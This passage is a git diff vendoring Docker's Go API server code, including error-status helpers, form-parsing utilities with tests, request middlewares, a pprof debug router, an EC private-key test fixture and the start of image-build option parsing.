+	return NewErrorWithStatusCode(err, http.StatusNotFound)
+}
+
+// NewRequestConflictError creates a new API error
+// that has the 409 HTTP status code associated to it.
+func NewRequestConflictError(err error) error {
+	return NewErrorWithStatusCode(err, http.StatusConflict)
+}
diff --git a/vendor/github.com/docker/docker/api/fixtures/keyfile b/vendor/github.com/docker/docker/api/fixtures/keyfile
new file mode 100644
index 0000000000..322f254404
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/fixtures/keyfile
@@ -0,0 +1,7 @@
+-----BEGIN EC PRIVATE KEY-----
+keyID: AWX2:I27X:WQFX:IOMK:CNAK:O7PW:VYNB:ZLKC:CVAE:YJP2:SI4A:XXAY
+
+MHcCAQEEILHTRWdcpKWsnORxSFyBnndJ4ROU41hMtr/GCiLVvwBQoAoGCCqGSM49
+AwEHoUQDQgAElpVFbQ2V2UQKajqdE3fVxJ+/pE/YuEFOxWbOxF2be19BY209/iky
+NzeFFK7SLpQ4CBJ7zDVXOHsMzrkY/GquGA==
+-----END EC PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/api/server/httputils/decoder.go b/vendor/github.com/docker/docker/api/server/httputils/decoder.go
new file mode 100644
index 0000000000..458eac5600
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/decoder.go
@@ -0,0 +1,16 @@
+package httputils
+
+import (
+	"io"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/network"
+)
+
+// ContainerDecoder specifies how
+// to translate an io.Reader into
+// container configuration.
+type ContainerDecoder interface {
+	DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *network.NetworkingConfig, error)
+	DecodeHostConfig(src io.Reader) (*container.HostConfig, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/errors.go b/vendor/github.com/docker/docker/api/server/httputils/errors.go
new file mode 100644
index 0000000000..59098a9df0
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/errors.go
@@ -0,0 +1,101 @@
+package httputils
+
+import (
+	"net/http"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/gorilla/mux"
+	"google.golang.org/grpc"
+)
+
+// httpStatusError is an interface
+// that errors with custom status codes
+// implement to tell the api layer
+// which response status to set.
+type httpStatusError interface {
+	HTTPErrorStatusCode() int
+}
+
+// inputValidationError is an interface
+// that errors generated by invalid
+// inputs can implement to tell the
+// api layer to set a 400 status code
+// in the response.
+type inputValidationError interface {
+	IsValidationError() bool
+}
+
+// GetHTTPErrorStatusCode retrieves status code from error message
+func GetHTTPErrorStatusCode(err error) int {
+	if err == nil {
+		logrus.WithFields(logrus.Fields{"error": err}).Error("unexpected HTTP error handling")
+		return http.StatusInternalServerError
+	}
+
+	var statusCode int
+	errMsg := err.Error()
+
+	switch e := err.(type) {
+	case httpStatusError:
+		statusCode = e.HTTPErrorStatusCode()
+	case inputValidationError:
+		statusCode = http.StatusBadRequest
+	default:
+		// FIXME: this is brittle and should not be necessary, but we still need to identify if
+		// there are errors falling back into this logic.
+		// If we need to differentiate between different possible error types,
+		// we should create appropriate error types that implement the httpStatusError interface.
+		errStr := strings.ToLower(errMsg)
+		for _, status := range []struct {
+			keyword string
+			code    int
+		}{
+			{"not found", http.StatusNotFound},
+			{"no such", http.StatusNotFound},
+			{"bad parameter", http.StatusBadRequest},
+			{"no command", http.StatusBadRequest},
+			{"conflict", http.StatusConflict},
+			{"impossible", http.StatusNotAcceptable},
+			{"wrong login/password", http.StatusUnauthorized},
+			{"unauthorized", http.StatusUnauthorized},
+			{"hasn't been activated", http.StatusForbidden},
+			{"this node", http.StatusServiceUnavailable},
+		} {
+			if strings.Contains(errStr, status.keyword) {
+				statusCode = status.code
+				break
+			}
+		}
+	}
+
+	if statusCode == 0 {
+		statusCode = http.StatusInternalServerError
+	}
+
+	return statusCode
+}
+
+func apiVersionSupportsJSONErrors(version string) bool {
+	const firstAPIVersionWithJSONErrors = "1.23"
+	return version == "" || versions.GreaterThan(version, firstAPIVersionWithJSONErrors)
+}
+
+// MakeErrorHandler makes an HTTP handler that decodes a Docker error and
+// returns it in the response.
+func MakeErrorHandler(err error) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		statusCode := GetHTTPErrorStatusCode(err)
+		vars := mux.Vars(r)
+		if apiVersionSupportsJSONErrors(vars["version"]) {
+			response := &types.ErrorResponse{
+				Message: err.Error(),
+			}
+			WriteJSON(w, statusCode, response)
+		} else {
+			http.Error(w, grpc.ErrorDesc(err), statusCode)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/form.go b/vendor/github.com/docker/docker/api/server/httputils/form.go
new file mode 100644
index 0000000000..20188c12d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/form.go
@@ -0,0 +1,73 @@
+package httputils
+
+import (
+	"fmt"
+	"net/http"
+	"path/filepath"
+	"strconv"
+	"strings"
+)
+
+// BoolValue transforms a form value in different formats into a boolean type.
+func BoolValue(r *http.Request, k string) bool {
+	s := strings.ToLower(strings.TrimSpace(r.FormValue(k)))
+	return !(s == "" || s == "0" || s == "no" || s == "false" || s == "none")
+}
+
+// BoolValueOrDefault returns the default bool passed if the query param is
+// missing, otherwise it's just a proxy to boolValue above
+func BoolValueOrDefault(r *http.Request, k string, d bool) bool {
+	if _, ok := r.Form[k]; !ok {
+		return d
+	}
+	return BoolValue(r, k)
+}
+
+// Int64ValueOrZero parses a form value into an int64 type.
+// It returns 0 if the parsing fails.
+func Int64ValueOrZero(r *http.Request, k string) int64 {
+	val, err := Int64ValueOrDefault(r, k, 0)
+	if err != nil {
+		return 0
+	}
+	return val
+}
+
+// Int64ValueOrDefault parses a form value into an int64 type. If there is an
+// error, returns the error. If there is no value returns the default value.
+func Int64ValueOrDefault(r *http.Request, field string, def int64) (int64, error) {
+	if r.Form.Get(field) != "" {
+		value, err := strconv.ParseInt(r.Form.Get(field), 10, 64)
+		if err != nil {
+			return value, err
+		}
+		return value, nil
+	}
+	return def, nil
+}
+
+// ArchiveOptions stores archive information for different operations.
+type ArchiveOptions struct {
+	Name string
+	Path string
+}
+
+// ArchiveFormValues parses form values and turns them into ArchiveOptions.
+// It fails if the archive name and path are not in the request.
+func ArchiveFormValues(r *http.Request, vars map[string]string) (ArchiveOptions, error) {
+	if err := ParseForm(r); err != nil {
+		return ArchiveOptions{}, err
+	}
+
+	name := vars["name"]
+	path := filepath.FromSlash(r.Form.Get("path"))
+
+	switch {
+	case name == "":
+		return ArchiveOptions{}, fmt.Errorf("bad parameter: 'name' cannot be empty")
+	case path == "":
+		return ArchiveOptions{}, fmt.Errorf("bad parameter: 'path' cannot be empty")
+	}
+
+	return ArchiveOptions{name, path}, nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/form_test.go b/vendor/github.com/docker/docker/api/server/httputils/form_test.go
new file mode 100644
index 0000000000..c56f7c15e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/form_test.go
@@ -0,0 +1,105 @@
+package httputils
+
+import (
+	"net/http"
+	"net/url"
+	"testing"
+)
+
+func TestBoolValue(t *testing.T) {
+	cases := map[string]bool{
+		"":      false,
+		"0":     false,
+		"no":    false,
+		"false": false,
+		"none":  false,
+		"1":     true,
+		"yes":   true,
+		"true":  true,
+		"one":   true,
+		"100":   true,
+	}
+
+	for c, e := range cases {
+		v := url.Values{}
+		v.Set("test", c)
+		r, _ := http.NewRequest("POST", "", nil)
+		r.Form = v
+
+		a := BoolValue(r, "test")
+		if a != e {
+			t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a)
+		}
+	}
+}
+
+func TestBoolValueOrDefault(t *testing.T) {
+	r, _ := http.NewRequest("GET", "", nil)
+	if !BoolValueOrDefault(r, "queryparam", true) {
+		t.Fatal("Expected to get true default value, got false")
+	}
+
+	v := url.Values{}
+	v.Set("param", "")
+	r, _ = http.NewRequest("GET", "", nil)
+	r.Form = v
+	if BoolValueOrDefault(r, "param", true) {
+		t.Fatal("Expected not to get true")
+	}
+}
+
+func TestInt64ValueOrZero(t *testing.T) {
+	cases := map[string]int64{
+		"":     0,
+		"asdf": 0,
+		"0":    0,
+		"1":    1,
+	}
+
+	for c, e := range cases {
+		v := url.Values{}
+		v.Set("test", c)
+		r, _ := http.NewRequest("POST", "", nil)
+		r.Form = v
+
+		a := Int64ValueOrZero(r, "test")
+		if a != e {
+			t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a)
+		}
+	}
+}
+
+func TestInt64ValueOrDefault(t *testing.T) {
+	cases := map[string]int64{
+		"":   -1,
+		"-1": -1,
+		"42": 42,
+	}
+
+	for c, e := range cases {
+		v := url.Values{}
+		v.Set("test", c)
+		r, _ := http.NewRequest("POST", "", nil)
+		r.Form = v
+
+		a, err := Int64ValueOrDefault(r, "test", -1)
+		if a != e {
+			t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a)
+		}
+		if err != nil {
+			t.Fatalf("Error should be nil, but received: %s", err)
+		}
+	}
+}
+
+func TestInt64ValueOrDefaultWithError(t *testing.T) {
+	v := url.Values{}
+	v.Set("test", "invalid")
+	r, _ := http.NewRequest("POST", "", nil)
+	r.Form = v
+
+	_, err := Int64ValueOrDefault(r, "test", -1)
+	if err == nil {
+		t.Fatalf("Expected an error.")
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils.go b/vendor/github.com/docker/docker/api/server/httputils/httputils.go
new file mode 100644
index 0000000000..7930ff7a07
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/httputils.go
@@ -0,0 +1,90 @@
+package httputils
+
+import (
+	"fmt"
+	"io"
+	"net/http"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api"
+)
+
+// APIVersionKey is the client's requested API version.
+const APIVersionKey = "api-version"
+
+// UAStringKey is used as key type for user-agent string in net/context struct
+const UAStringKey = "upstream-user-agent"
+
+// APIFunc is an adapter to allow the use of ordinary functions as Docker API endpoints.
+// Any function that has the appropriate signature can be registered as an API endpoint (e.g. getVersion).
+type APIFunc func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error
+
+// HijackConnection interrupts the http response writer to get the
+// underlying connection and operate with it.
+func HijackConnection(w http.ResponseWriter) (io.ReadCloser, io.Writer, error) {
+	conn, _, err := w.(http.Hijacker).Hijack()
+	if err != nil {
+		return nil, nil, err
+	}
+	// Flush the options to make sure the client sets the raw mode
+	conn.Write([]byte{})
+	return conn, conn, nil
+}
+
+// CloseStreams ensures that a list for http streams are properly closed.
+func CloseStreams(streams ...interface{}) {
+	for _, stream := range streams {
+		if tcpc, ok := stream.(interface {
+			CloseWrite() error
+		}); ok {
+			tcpc.CloseWrite()
+		} else if closer, ok := stream.(io.Closer); ok {
+			closer.Close()
+		}
+	}
+}
+
+// CheckForJSON makes sure that the request's Content-Type is application/json.
+func CheckForJSON(r *http.Request) error {
+	ct := r.Header.Get("Content-Type")
+
+	// No Content-Type header is ok as long as there's no Body
+	if ct == "" {
+		if r.Body == nil || r.ContentLength == 0 {
+			return nil
+		}
+	}
+
+	// Otherwise it better be json
+	if api.MatchesContentType(ct, "application/json") {
+		return nil
+	}
+	return fmt.Errorf("Content-Type specified (%s) must be 'application/json'", ct)
+}
+
+// ParseForm ensures the request form is parsed even with invalid content types.
+// If we don't do this, POST method without Content-type (even with empty body) will fail.
+func ParseForm(r *http.Request) error {
+	if r == nil {
+		return nil
+	}
+	if err := r.ParseForm(); err != nil && !strings.HasPrefix(err.Error(), "mime:") {
+		return err
+	}
+	return nil
+}
+
+// VersionFromContext returns an API version from the context using APIVersionKey.
+// It panics if the context value does not have version.Version type.
+func VersionFromContext(ctx context.Context) (ver string) {
+	if ctx == nil {
+		return
+	}
+	val := ctx.Value(APIVersionKey)
+	if val == nil {
+		return
+	}
+	return val.(string)
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go
new file mode 100644
index 0000000000..4787cc3c33
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go
@@ -0,0 +1,17 @@
+// +build go1.7
+
+package httputils
+
+import (
+	"encoding/json"
+	"net/http"
+)
+
+// WriteJSON writes the value v to the http response stream as json with standard json encoding.
+func WriteJSON(w http.ResponseWriter, code int, v interface{}) error {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(code)
+	enc := json.NewEncoder(w)
+	enc.SetEscapeHTML(false)
+	return enc.Encode(v)
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go
new file mode 100644
index 0000000000..bdc6981738
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go
@@ -0,0 +1,16 @@
+// +build go1.6,!go1.7
+
+package httputils
+
+import (
+	"encoding/json"
+	"net/http"
+)
+
+// WriteJSON writes the value v to the http response stream as json with standard json encoding.
+func WriteJSON(w http.ResponseWriter, code int, v interface{}) error {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(code)
+	enc := json.NewEncoder(w)
+	return enc.Encode(v)
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware.go b/vendor/github.com/docker/docker/api/server/middleware.go
new file mode 100644
index 0000000000..537ce8028f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware.go
@@ -0,0 +1,24 @@
+package server
+
+import (
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/middleware"
+)
+
+// handlerWithGlobalMiddlewares wraps the handler function for a request with
+// the server's global middlewares. The order of the middlewares is backwards,
+// meaning that the first in the list will be evaluated last.
+func (s *Server) handlerWithGlobalMiddlewares(handler httputils.APIFunc) httputils.APIFunc {
+	next := handler
+
+	for _, m := range s.middlewares {
+		next = m.WrapHandler(next)
+	}
+
+	if s.cfg.Logging && logrus.GetLevel() == logrus.DebugLevel {
+		next = middleware.DebugRequestMiddleware(next)
+	}
+
+	return next
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/cors.go b/vendor/github.com/docker/docker/api/server/middleware/cors.go
new file mode 100644
index 0000000000..ea725dbc72
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/cors.go
@@ -0,0 +1,37 @@
+package middleware
+
+import (
+	"net/http"
+
+	"github.com/Sirupsen/logrus"
+	"golang.org/x/net/context"
+)
+
+// CORSMiddleware injects CORS headers to each request
+// when it's configured.
+type CORSMiddleware struct {
+	defaultHeaders string
+}
+
+// NewCORSMiddleware creates a new CORSMiddleware with default headers.
+func NewCORSMiddleware(d string) CORSMiddleware {
+	return CORSMiddleware{defaultHeaders: d}
+}
+
+// WrapHandler returns a new handler function wrapping the previous one in the request chain.
+func (c CORSMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		// If "api-cors-header" is not given, but "api-enable-cors" is true, we set cors to "*"
+		// otherwise, all head values will be passed to HTTP handler
+		corsHeaders := c.defaultHeaders
+		if corsHeaders == "" {
+			corsHeaders = "*"
+		}
+
+		logrus.Debugf("CORS header is enabled and set to: %s", corsHeaders)
+		w.Header().Add("Access-Control-Allow-Origin", corsHeaders)
+		w.Header().Add("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, X-Registry-Auth")
+		w.Header().Add("Access-Control-Allow-Methods", "HEAD, GET, POST, DELETE, PUT, OPTIONS")
+		return handler(ctx, w, r, vars)
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/debug.go b/vendor/github.com/docker/docker/api/server/middleware/debug.go
new file mode 100644
index 0000000000..8c8567669b
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/debug.go
@@ -0,0 +1,76 @@
+package middleware
+
+import (
+	"bufio"
+	"encoding/json"
+	"io"
+	"net/http"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/pkg/ioutils"
+	"golang.org/x/net/context"
+)
+
+// DebugRequestMiddleware dumps the request to logger
+func DebugRequestMiddleware(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		logrus.Debugf("Calling %s %s", r.Method, r.RequestURI)
+
+		if r.Method != "POST" {
+			return handler(ctx, w, r, vars)
+		}
+		if err := httputils.CheckForJSON(r); err != nil {
+			return handler(ctx, w, r, vars)
+		}
+		maxBodySize := 4096 // 4KB
+		if r.ContentLength > int64(maxBodySize) {
+			return handler(ctx, w, r, vars)
+		}
+
+		body := r.Body
+		bufReader := bufio.NewReaderSize(body, maxBodySize)
+		r.Body = ioutils.NewReadCloserWrapper(bufReader, func() error { return body.Close() })
+
+		b, err := bufReader.Peek(maxBodySize)
+		if err != io.EOF {
+			// either there was an error reading, or the buffer is full (in which case the request is too large)
+			return handler(ctx, w, r, vars)
+		}
+
+		var postForm map[string]interface{}
+		if err := json.Unmarshal(b, &postForm); err == nil {
+			maskSecretKeys(postForm)
+			formStr, errMarshal := json.Marshal(postForm)
+			if errMarshal == nil {
+				logrus.Debugf("form data: %s", string(formStr))
+			} else {
+				logrus.Debugf("form data: %q", postForm)
+			}
+		}
+
+		return handler(ctx, w, r, vars)
+	}
+}
+
+func maskSecretKeys(inp interface{}) {
+	if arr, ok := inp.([]interface{}); ok {
+		for _, f := range arr {
+			maskSecretKeys(f)
+		}
+		return
+	}
+	if form, ok := inp.(map[string]interface{}); ok {
+	loop0:
+		for k, v := range form {
+			for _, m := range []string{"password", "secret", "jointoken", "unlockkey"} {
+				if strings.EqualFold(m, k) {
+					form[k] = "*****"
+					continue loop0
+				}
+			}
+			maskSecretKeys(v)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/experimental.go b/vendor/github.com/docker/docker/api/server/middleware/experimental.go
new file mode 100644
index 0000000000..b8f56e88b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/experimental.go
@@ -0,0 +1,29 @@
+package middleware
+
+import (
+	"net/http"
+
+	"golang.org/x/net/context"
+)
+
+// ExperimentalMiddleware is a the middleware in charge of adding the
+// 'Docker-Experimental' header to every outgoing request
+type ExperimentalMiddleware struct {
+	experimental string
+}
+
+// NewExperimentalMiddleware creates a new ExperimentalMiddleware
+func NewExperimentalMiddleware(experimentalEnabled bool) ExperimentalMiddleware {
+	if experimentalEnabled {
+		return ExperimentalMiddleware{"true"}
+	}
+	return ExperimentalMiddleware{"false"}
+}
+
+// WrapHandler returns a new handler function wrapping the previous one in the request chain.
+func (e ExperimentalMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		w.Header().Set("Docker-Experimental", e.experimental)
+		return handler(ctx, w, r, vars)
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/middleware.go b/vendor/github.com/docker/docker/api/server/middleware/middleware.go
new file mode 100644
index 0000000000..dc1f5bfa0d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/middleware.go
@@ -0,0 +1,13 @@
+package middleware
+
+import (
+	"net/http"
+
+	"golang.org/x/net/context"
+)
+
+// Middleware is an interface to allow the use of ordinary functions as Docker API filters.
+// Any struct that has the appropriate signature can be registered as a middleware.
+type Middleware interface {
+	WrapHandler(func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/version.go b/vendor/github.com/docker/docker/api/server/middleware/version.go
new file mode 100644
index 0000000000..11014659e5
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/version.go
@@ -0,0 +1,50 @@
+package middleware
+
+import (
+	"fmt"
+	"net/http"
+	"runtime"
+
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types/versions"
+	"golang.org/x/net/context"
+)
+
+// VersionMiddleware is a middleware that
+// validates the client and server versions.
+type VersionMiddleware struct {
+	serverVersion  string
+	defaultVersion string
+	minVersion     string
+}
+
+// NewVersionMiddleware creates a new VersionMiddleware
+// with the default versions.
+func NewVersionMiddleware(s, d, m string) VersionMiddleware {
+	return VersionMiddleware{
+		serverVersion:  s,
+		defaultVersion: d,
+		minVersion:     m,
+	}
+}
+
+// WrapHandler returns a new handler function wrapping the previous one in the request chain.
+func (v VersionMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		apiVersion := vars["version"]
+		if apiVersion == "" {
+			apiVersion = v.defaultVersion
+		}
+
+		if versions.LessThan(apiVersion, v.minVersion) {
+			return errors.NewBadRequestError(fmt.Errorf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", apiVersion, v.minVersion))
+		}
+
+		header := fmt.Sprintf("Docker/%s (%s)", v.serverVersion, runtime.GOOS)
+		w.Header().Set("Server", header)
+		w.Header().Set("API-Version", v.defaultVersion)
+		ctx = context.WithValue(ctx, "api-version", apiVersion)
+		return handler(ctx, w, r, vars)
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/version_test.go b/vendor/github.com/docker/docker/api/server/middleware/version_test.go
new file mode 100644
index 0000000000..9e72efd78d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/version_test.go
@@ -0,0 +1,57 @@
+package middleware
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/server/httputils"
+	"golang.org/x/net/context"
+)
+
+func TestVersionMiddleware(t *testing.T) {
+	handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		if httputils.VersionFromContext(ctx) == "" {
+			t.Fatalf("Expected version, got empty string")
+		}
+		return nil
+	}
+
+	defaultVersion := "1.10.0"
+	minVersion := "1.2.0"
+	m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion)
+	h := m.WrapHandler(handler)
+
+	req, _ := http.NewRequest("GET", "/containers/json", nil)
+	resp := httptest.NewRecorder()
+	ctx := context.Background()
+	if err := h(ctx, resp, req, map[string]string{}); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestVersionMiddlewareWithErrors(t *testing.T) {
+	handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		if httputils.VersionFromContext(ctx) == "" {
+			t.Fatalf("Expected version, got empty string")
+		}
+		return nil
+	}
+
+	defaultVersion := "1.10.0"
+	minVersion := "1.2.0"
+	m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion)
+	h := m.WrapHandler(handler)
+
+	req, _ := http.NewRequest("GET", "/containers/json", nil)
+	resp := httptest.NewRecorder()
+	ctx := context.Background()
+
+	vars := map[string]string{"version": "0.1"}
+	err := h(ctx, resp, req, vars)
+
+	if !strings.Contains(err.Error(), "client version 0.1 is too old. Minimum supported API version is 1.2.0") {
+		t.Fatalf("Expected too old client error, got %v", err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/profiler.go b/vendor/github.com/docker/docker/api/server/profiler.go
new file mode 100644
index 0000000000..8bf8384fdb
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/profiler.go
@@ -0,0 +1,41 @@
+package server
+
+import (
+	"expvar"
+	"fmt"
+	"net/http"
+	"net/http/pprof"
+
+	"github.com/gorilla/mux"
+)
+
+const debugPathPrefix = "/debug/"
+
+func profilerSetup(mainRouter *mux.Router) {
+	var r = mainRouter.PathPrefix(debugPathPrefix).Subrouter()
+	r.HandleFunc("/vars", expVars)
+	r.HandleFunc("/pprof/", pprof.Index)
+	r.HandleFunc("/pprof/cmdline", pprof.Cmdline)
+	r.HandleFunc("/pprof/profile", pprof.Profile)
+	r.HandleFunc("/pprof/symbol", pprof.Symbol)
+	r.HandleFunc("/pprof/trace", pprof.Trace)
+	r.HandleFunc("/pprof/block", pprof.Handler("block").ServeHTTP)
+	r.HandleFunc("/pprof/heap", pprof.Handler("heap").ServeHTTP)
+	r.HandleFunc("/pprof/goroutine", pprof.Handler("goroutine").ServeHTTP)
+	r.HandleFunc("/pprof/threadcreate", pprof.Handler("threadcreate").ServeHTTP)
+}
+
+// Replicated from expvar.go as not public.
+func expVars(w http.ResponseWriter, r *http.Request) {
+	first := true
+	w.Header().Set("Content-Type", "application/json; charset=utf-8")
+	fmt.Fprintf(w, "{\n")
+	expvar.Do(func(kv expvar.KeyValue) {
+		if !first {
+			fmt.Fprintf(w, ",\n")
+		}
+		first = false
+		fmt.Fprintf(w, "%q: %s", kv.Key, kv.Value)
+	})
+	fmt.Fprintf(w, "\n}\n")
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/build/backend.go b/vendor/github.com/docker/docker/api/server/router/build/backend.go
new file mode 100644
index 0000000000..0f01c11af4
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/build/backend.go
@@ -0,0 +1,20 @@
+package build
+
+import (
+	"io"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"golang.org/x/net/context"
+)
+
+// Backend abstracts an image builder whose only purpose is to build an image referenced by an imageID.
+type Backend interface {
+	// Build builds a Docker image referenced by an imageID string.
+	//
+	// Note: Tagging an image should not be done by a Builder, it should instead be done
+	// by the caller.
+	//
+	// TODO: make this return a reference instead of string
+	BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/build/build.go b/vendor/github.com/docker/docker/api/server/router/build/build.go
new file mode 100644
index 0000000000..959498e0f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/build/build.go
@@ -0,0 +1,29 @@
+package build
+
+import "github.com/docker/docker/api/server/router"
+
+// buildRouter is a router to talk with the build controller
+type buildRouter struct {
+	backend Backend
+	routes  []router.Route
+}
+
+// NewRouter initializes a new build router
+func NewRouter(b Backend) router.Router {
+	r := &buildRouter{
+		backend: b,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routers to the build controller
+func (r *buildRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func (r *buildRouter) initRoutes() {
+	r.routes = []router.Route{
+		router.Cancellable(router.NewPostRoute("/build", r.postBuild)),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/build/build_routes.go b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go
new file mode 100644
index 0000000000..75425b19fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go
@@ -0,0 +1,225 @@
+package build
+
+import (
+	"bytes"
+	"encoding/base64"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"runtime"
+	"strconv"
+	"strings"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/go-units"
+	"golang.org/x/net/context"
+)
+
+func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBuildOptions, error) {
+	version := httputils.VersionFromContext(ctx)
+	options := &types.ImageBuildOptions{}
+	if httputils.BoolValue(r, "forcerm") && versions.GreaterThanOrEqualTo(version, "1.12") {
+		options.Remove = true
+	} else if r.FormValue("rm") == "" && versions.GreaterThanOrEqualTo(version, "1.12") {
+		options.Remove = true
+	} else {
+		options.Remove = httputils.BoolValue(r, "rm")
+	}
+	if httputils.BoolValue(r, "pull") && versions.GreaterThanOrEqualTo(version, "1.16") {
+		options.PullParent = true
+	}
+
+	options.Dockerfile = r.FormValue("dockerfile")
+	options.SuppressOutput = httputils.BoolValue(r, "q")
+	options.NoCache = httputils.BoolValue(r, "nocache")
+	options.ForceRemove = httputils.BoolValue(r, "forcerm")
+	options.MemorySwap = httputils.Int64ValueOrZero(r, "memswap")
+	options.Memory = httputils.Int64ValueOrZero(r, "memory")
+	options.CPUShares = httputils.Int64ValueOrZero(r, "cpushares")
+	options.CPUPeriod = httputils.Int64ValueOrZero(r, "cpuperiod")
+	options.CPUQuota = httputils.Int64ValueOrZero(r, "cpuquota")
+	options.CPUSetCPUs = r.FormValue("cpusetcpus")
+	options.CPUSetMems = r.FormValue("cpusetmems")
+	options.CgroupParent = r.FormValue("cgroupparent")
+	options.NetworkMode = r.FormValue("networkmode")
+	options.Tags = r.Form["t"]
+	options.SecurityOpt = r.Form["securityopt"]
+	options.Squash = httputils.BoolValue(r, "squash")
+
+	if r.Form.Get("shmsize") != "" {
+		shmSize, err := strconv.ParseInt(r.Form.Get("shmsize"), 10, 64)
+		if err != nil {
+			return nil, err
+		}
+		options.ShmSize = shmSize
+	}
